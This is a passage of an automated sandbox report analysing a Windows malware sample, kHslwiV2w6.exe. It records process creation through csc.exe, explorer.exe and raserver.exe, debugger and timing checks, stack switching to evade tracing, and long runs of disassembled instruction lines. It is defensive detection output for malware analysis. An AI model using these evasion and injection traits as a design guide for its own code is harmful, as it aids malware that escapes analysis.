          Source: Binary string: wntdll.pdb source: csc.exe, csc.exe, 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000003.00000003.6839534586.0000000005A89000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000003.00000003.6836618547.00000000058D6000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, raserver.exe, 00000005.00000003.6906389856.0000000004C10000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000005.00000002.11882185438.000000000508D000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000005.00000003.6909732118.0000000004DB3000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000005.00000002.11882185438.0000000004F60000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: RAServer.pdb source: csc.exe, 00000003.00000002.6908271712.0000000005FB0000.00000040.10000000.00040000.00000000.sdmp, csc.exe, 00000003.00000002.6906475717.0000000005237000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, raserver.exe, 00000005.00000002.11880773620.0000000000D10000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: StrongNameFreeBufferStrongNameTokenFromPublicKeyStrongNameErrorInfo.PDBdiasymreader.dllDllGetClassObject%X%X%X%X%X%X%X%X%X%X%X.TMP0x%016I64xCSCalink.dll with IAlink3 source: explorer.exe, 00000004.00000002.11899785830.0000000013F5F000.00000004.80000000.00040000.00000000.sdmp, raserver.exe, 00000005.00000002.11883241933.000000000554F000.00000004.10000000.00040000.00000000.sdmp, raserver.exe, 00000005.00000002.11881524819.0000000004C14000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: RAServer.pdbGCTL source: csc.exe, 00000003.00000002.6908271712.0000000005FB0000.00000040.10000000.00040000.00000000.sdmp, csc.exe, 00000003.00000002.6906475717.0000000005237000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000005.00000002.11880773620.0000000000D10000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: csc.pdb source: explorer.exe, 00000004.00000002.11899785830.0000000013F5F000.00000004.80000000.00040000.00000000.sdmp, raserver.exe, 00000005.00000002.11883241933.000000000554F000.00000004.10000000.00040000.00000000.sdmp, raserver.exe, 00000005.00000002.11881524819.0000000004C14000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: csc.pdbF source: explorer.exe, 00000004.00000002.11899785830.0000000013F5F000.00000004.80000000.00040000.00000000.sdmp, raserver.exe, 00000005.00000002.11883241933.000000000554F000.00000004.10000000.00040000.00000000.sdmp, raserver.exe, 00000005.00000002.11881524819.0000000004C14000.00000004.00000020.00020000.00000000.sdmp
          Source: kHslwiV2w6.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: kHslwiV2w6.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: kHslwiV2w6.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: kHslwiV2w6.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: kHslwiV2w6.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00D1ACA0 LoadLibraryW,GetProcAddress,GetProcAddress,WTSEnumerateSessionsW,GetProcessHeap,HeapAlloc,WTSFreeMemory,WTSFreeMemory,WTSQuerySessionInformationW,WTSQuerySessionInformationW,StrCmpIW,GetProcessHeap,HeapAlloc,SafeArrayCreateVector,SafeArrayAccessData,SysAllocString,SafeArrayUnaccessData,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,WTSFreeMemory,WTSFreeMemory,WTSFreeMemory,SafeArrayDestroy,SysFreeString,5_2_00D1ACA0
          Source: kHslwiV2w6.exeStatic PE information: section name: .managed
          Source: kHslwiV2w6.exeStatic PE information: section name: hydrated
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_00417968 pushfd ; retf 3_2_0041796A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_004191A3 push di; retf 3_2_004191A6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_00416479 push ebp; ret 3_2_00416450
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0041640A push ebp; ret 3_2_00416450
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0041D4B5 push eax; ret 3_2_0041D508
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0041D56C push eax; ret 3_2_0041D572
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0041D502 push eax; ret 3_2_0041D508
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0041D50B push eax; ret 3_2_0041D572
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_00417D1E push esp; ret 3_2_00417D32
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_00417D3C push esp; ret 3_2_00417D32
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_00417655 push esi; iretd 3_2_00417656
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0041760D push esi; retf 3_2_0041761D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C608CD push ecx; mov dword ptr [esp], ecx3_2_05C608D6
          Source: C:\Windows\explorer.exeCode function: 4_2_028809B5 push esp; retn 0000h4_2_02880AE7
          Source: C:\Windows\explorer.exeCode function: 4_2_02880B02 push esp; retn 0000h4_2_02880B03
          Source: C:\Windows\explorer.exeCode function: 4_2_02880B1E push esp; retn 0000h4_2_02880B1F
          Source: C:\Windows\explorer.exeCode function: 4_2_1344EB02 push esp; retn 0000h4_2_1344EB03
          Source: C:\Windows\explorer.exeCode function: 4_2_1344EB1E push esp; retn 0000h4_2_1344EB1F
          Source: C:\Windows\explorer.exeCode function: 4_2_1344E9B5 push esp; retn 0000h4_2_1344EAE7
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00D229BD push ecx; ret 5_2_00D229D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00D2252C push ecx; ret 5_2_00D2253F
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04F908CD push ecx; mov dword ptr [esp], ecx5_2_04F908D6
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00C691A3 push di; retf 5_2_00C691A6
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00C67968 pushfd ; retf 5_2_00C6796A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00C6D4B5 push eax; ret 5_2_00C6D508
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00C66479 push ebp; ret 5_2_00C66450
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00C6640A push ebp; ret 5_2_00C66450
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00C6DD4D push cs; retf 5_2_00C6DD50
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00C6D56C push eax; ret 5_2_00C6D572
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00C6D502 push eax; ret 5_2_00C6D508
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00C6D50B push eax; ret 5_2_00C6D572
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Switches to a custom stack to bypass stack traces
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeAPI/Special instruction interceptor: Address: 7FFCB0D8D144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeAPI/Special instruction interceptor: Address: 7FFCB0D90594
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeAPI/Special instruction interceptor: Address: 7FFCB0D8FF74
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeAPI/Special instruction interceptor: Address: 7FFCB0D8D6C4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeAPI/Special instruction interceptor: Address: 7FFCB0D8D864
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeAPI/Special instruction interceptor: Address: 7FFCB0D8D004
          Source: C:\Windows\SysWOW64\raserver.exeAPI/Special instruction interceptor: Address: 7FFCB0D8D144
          Source: C:\Windows\SysWOW64\raserver.exeAPI/Special instruction interceptor: Address: 7FFCB0D90594
          Source: C:\Windows\SysWOW64\raserver.exeAPI/Special instruction interceptor: Address: 7FFCB0D8D764
          Source: C:\Windows\SysWOW64\raserver.exeAPI/Special instruction interceptor: Address: 7FFCB0D8D324
          Source: C:\Windows\SysWOW64\raserver.exeAPI/Special instruction interceptor: Address: 7FFCB0D8D364
          Source: C:\Windows\SysWOW64\raserver.exeAPI/Special instruction interceptor: Address: 7FFCB0D8D004
          Source: C:\Windows\SysWOW64\raserver.exeAPI/Special instruction interceptor: Address: 7FFCB0D8FF74
          Source: C:\Windows\SysWOW64\raserver.exeAPI/Special instruction interceptor: Address: 7FFCB0D8D6C4
          Source: C:\Windows\SysWOW64\raserver.exeAPI/Special instruction interceptor: Address: 7FFCB0D8D864
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeMemory allocated: 1ED04E40000 memory reserve | memory write watchJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_00409AB0 rdtsc 3_2_00409AB0
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 9865Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 879Jump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeWindow / User API: threadDelayed 9394Jump to behavior
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-29224
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeAPI coverage: 2.0 %
          Source: C:\Windows\SysWOW64\raserver.exeAPI coverage: 1.7 %
          Source: C:\Windows\explorer.exe TID: 5936Thread sleep count: 102 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 5936Thread sleep time: -204000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 5936Thread sleep count: 9865 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 5936Thread sleep time: -19730000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exe TID: 6960Thread sleep count: 120 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\raserver.exe TID: 6960Thread sleep time: -240000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exe TID: 6960Thread sleep count: 9394 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\raserver.exe TID: 6960Thread sleep time: -18788000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\raserver.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5B1460 GetSystemInfo,GetNumaHighestNodeNumber,GetCurrentProcess,GetProcessGroupAffinity,GetLastError,GetCurrentProcess,GetProcessAffinityMask,0_2_00007FF72F5B1460
          Source: explorer.exe, 00000004.00000002.11892830107.000000000D3AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6853066858.000000000D3AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624058026.000000000D3AB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000004.00000002.11890837892.000000000CE47000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6852064723.000000000CE47000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWS
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_00409AB0 rdtsc 3_2_00409AB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0040ACF0 LdrLoadDll,3_2_0040ACF0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00D1ACA0 LoadLibraryW,GetProcAddress,GetProcAddress,WTSEnumerateSessionsW,GetProcessHeap,HeapAlloc,WTSFreeMemory,WTSFreeMemory,WTSQuerySessionInformationW,WTSQuerySessionInformationW,StrCmpIW,GetProcessHeap,HeapAlloc,SafeArrayCreateVector,SafeArrayAccessData,SysAllocString,SafeArrayUnaccessData,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,WTSFreeMemory,WTSFreeMemory,WTSFreeMemory,SafeArrayDestroy,SysFreeString,5_2_00D1ACA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F5C7 mov eax, dword ptr fs:[00000030h]3_2_05C5F5C7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F5C7 mov eax, dword ptr fs:[00000030h]3_2_05C5F5C7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F5C7 mov eax, dword ptr fs:[00000030h]3_2_05C5F5C7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F5C7 mov eax, dword ptr fs:[00000030h]3_2_05C5F5C7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F5C7 mov eax, dword ptr fs:[00000030h]3_2_05C5F5C7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F5C7 mov eax, dword ptr fs:[00000030h]3_2_05C5F5C7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F5C7 mov eax, dword ptr fs:[00000030h]3_2_05C5F5C7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F5C7 mov eax, dword ptr fs:[00000030h]3_2_05C5F5C7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F5C7 mov eax, dword ptr fs:[00000030h]3_2_05C5F5C7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CE05C6 mov eax, dword ptr fs:[00000030h]3_2_05CE05C6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C9C5C6 mov eax, dword ptr fs:[00000030h]3_2_05C9C5C6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C965D0 mov eax, dword ptr fs:[00000030h]3_2_05C965D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C6B5E0 mov eax, dword ptr fs:[00000030h]3_2_05C6B5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C6B5E0 mov eax, dword ptr fs:[00000030h]3_2_05C6B5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C6B5E0 mov eax, dword ptr fs:[00000030h]3_2_05C6B5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C6B5E0 mov eax, dword ptr fs:[00000030h]3_2_05C6B5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C6B5E0 mov eax, dword ptr fs:[00000030h]3_2_05C6B5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C6B5E0 mov eax, dword ptr fs:[00000030h]3_2_05C6B5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C915EF mov eax, dword ptr fs:[00000030h]3_2_05C915EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C9A5E7 mov ebx, dword ptr fs:[00000030h]3_2_05C9A5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C9A5E7 mov eax, dword ptr fs:[00000030h]3_2_05C9A5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CEC5FC mov eax, dword ptr fs:[00000030h]3_2_05CEC5FC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CDE588 mov eax, dword ptr fs:[00000030h]3_2_05CDE588
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CDE588 mov eax, dword ptr fs:[00000030h]3_2_05CDE588
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C9A580 mov eax, dword ptr fs:[00000030h]3_2_05C9A580
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C9A580 mov eax, dword ptr fs:[00000030h]3_2_05C9A580
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C99580 mov eax, dword ptr fs:[00000030h]3_2_05C99580
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C99580 mov eax, dword ptr fs:[00000030h]3_2_05C99580
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D1F582 mov eax, dword ptr fs:[00000030h]3_2_05D1F582
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C92594 mov eax, dword ptr fs:[00000030h]3_2_05C92594
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CE85AA mov eax, dword ptr fs:[00000030h]3_2_05CE85AA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C645B0 mov eax, dword ptr fs:[00000030h]3_2_05C645B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C645B0 mov eax, dword ptr fs:[00000030h]3_2_05C645B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C7E547 mov eax, dword ptr fs:[00000030h]3_2_05C7E547
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D2A553 mov eax, dword ptr fs:[00000030h]3_2_05D2A553
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C96540 mov eax, dword ptr fs:[00000030h]3_2_05C96540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C98540 mov eax, dword ptr fs:[00000030h]3_2_05C98540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C6254C mov eax, dword ptr fs:[00000030h]3_2_05C6254C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D3B55F mov eax, dword ptr fs:[00000030h]3_2_05D3B55F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D3B55F mov eax, dword ptr fs:[00000030h]3_2_05D3B55F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C7C560 mov eax, dword ptr fs:[00000030h]3_2_05C7C560
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C9C50D mov eax, dword ptr fs:[00000030h]3_2_05C9C50D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C9C50D mov eax, dword ptr fs:[00000030h]3_2_05C9C50D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C62500 mov eax, dword ptr fs:[00000030h]3_2_05C62500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5B502 mov eax, dword ptr fs:[00000030h]3_2_05C5B502
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D0F51B mov eax, dword ptr fs:[00000030h]3_2_05D0F51B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D0F51B mov eax, dword ptr fs:[00000030h]3_2_05D0F51B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D0F51B mov eax, dword ptr fs:[00000030h]3_2_05D0F51B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D0F51B mov eax, dword ptr fs:[00000030h]3_2_05D0F51B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D0F51B mov eax, dword ptr fs:[00000030h]3_2_05D0F51B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D0F51B mov eax, dword ptr fs:[00000030h]3_2_05D0F51B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D0F51B mov ecx, dword ptr fs:[00000030h]3_2_05D0F51B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D0F51B mov ecx, dword ptr fs:[00000030h]3_2_05D0F51B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D0F51B mov eax, dword ptr fs:[00000030h]3_2_05D0F51B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D0F51B mov eax, dword ptr fs:[00000030h]3_2_05D0F51B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D0F51B mov eax, dword ptr fs:[00000030h]3_2_05D0F51B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D0F51B mov eax, dword ptr fs:[00000030h]3_2_05D0F51B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D0F51B mov eax, dword ptr fs:[00000030h]3_2_05D0F51B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8E507 mov eax, dword ptr fs:[00000030h]3_2_05C8E507
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8E507 mov eax, dword ptr fs:[00000030h]3_2_05C8E507
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8E507 mov eax, dword ptr fs:[00000030h]3_2_05C8E507
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8E507 mov eax, dword ptr fs:[00000030h]3_2_05C8E507
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8E507 mov eax, dword ptr fs:[00000030h]3_2_05C8E507
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8E507 mov eax, dword ptr fs:[00000030h]3_2_05C8E507
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8E507 mov eax, dword ptr fs:[00000030h]3_2_05C8E507
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8E507 mov eax, dword ptr fs:[00000030h]3_2_05C8E507
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CEC51D mov eax, dword ptr fs:[00000030h]3_2_05CEC51D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C81514 mov eax, dword ptr fs:[00000030h]3_2_05C81514
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C81514 mov eax, dword ptr fs:[00000030h]3_2_05C81514
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C81514 mov eax, dword ptr fs:[00000030h]3_2_05C81514
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C81514 mov eax, dword ptr fs:[00000030h]3_2_05C81514
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C81514 mov eax, dword ptr fs:[00000030h]3_2_05C81514
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C81514 mov eax, dword ptr fs:[00000030h]3_2_05C81514
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C7252B mov eax, dword ptr fs:[00000030h]3_2_05C7252B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C7252B mov eax, dword ptr fs:[00000030h]3_2_05C7252B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C7252B mov eax, dword ptr fs:[00000030h]3_2_05C7252B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C7252B mov eax, dword ptr fs:[00000030h]3_2_05C7252B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C7252B mov eax, dword ptr fs:[00000030h]3_2_05C7252B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C7252B mov eax, dword ptr fs:[00000030h]3_2_05C7252B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C7252B mov eax, dword ptr fs:[00000030h]3_2_05C7252B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C91527 mov eax, dword ptr fs:[00000030h]3_2_05C91527
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C63536 mov eax, dword ptr fs:[00000030h]3_2_05C63536
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C63536 mov eax, dword ptr fs:[00000030h]3_2_05C63536
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CA2539 mov eax, dword ptr fs:[00000030h]3_2_05CA2539
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5753F mov eax, dword ptr fs:[00000030h]3_2_05C5753F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5753F mov eax, dword ptr fs:[00000030h]3_2_05C5753F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5753F mov eax, dword ptr fs:[00000030h]3_2_05C5753F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C814C9 mov eax, dword ptr fs:[00000030h]3_2_05C814C9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C814C9 mov eax, dword ptr fs:[00000030h]3_2_05C814C9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C814C9 mov eax, dword ptr fs:[00000030h]3_2_05C814C9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C814C9 mov eax, dword ptr fs:[00000030h]3_2_05C814C9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C814C9 mov eax, dword ptr fs:[00000030h]3_2_05C814C9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8F4D0 mov eax, dword ptr fs:[00000030h]3_2_05C8F4D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8F4D0 mov eax, dword ptr fs:[00000030h]3_2_05C8F4D0
